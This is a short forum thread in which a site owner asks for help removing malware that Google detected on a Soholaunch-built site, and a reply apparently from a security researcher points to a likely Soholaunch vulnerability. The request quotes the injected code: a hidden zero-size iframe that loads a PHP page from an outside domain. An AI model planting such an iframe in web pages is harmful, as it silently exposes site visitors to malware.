I just received email from google that my site has been identified as being infected with mailware .
google webmaster tool says:
injected code :
<iframe src=“http://karatepacan.co.cc/up/go.php?sid=2” width
=“0” height=“0” frameborder="0">
the following pages are affected .
The sites are set up with Soholaunch and Simple machines forum
http://polarissnowmobile .ca/
http://www.polarissnowmobile .ca/
http://www.polarissnowmobile .ca/index.php?pr=Snowmobile_Classifiedds
I was not sure how to take down the site,so I just redirected my url to an unrelated blogpage .
Please can someone help me how to find and remove code .
i already changed my passwords and tried to look through files,but cannot find it .
The hosting company has not answered my emails .
Thank you .
Hi,
I don’t see it on your site right now, but on other affected site the same code is injected at the very top of the HTML code, right before the <html> tag.
I checked several affected sites and they are all built with Soho (Soholaunch). I guess there is a vulnerability in this product. Make sure it is fully patched (I’m not familiar with it, so don’t know how it works and whether it has security patches)
Denis – www.UnmaskParasites.com



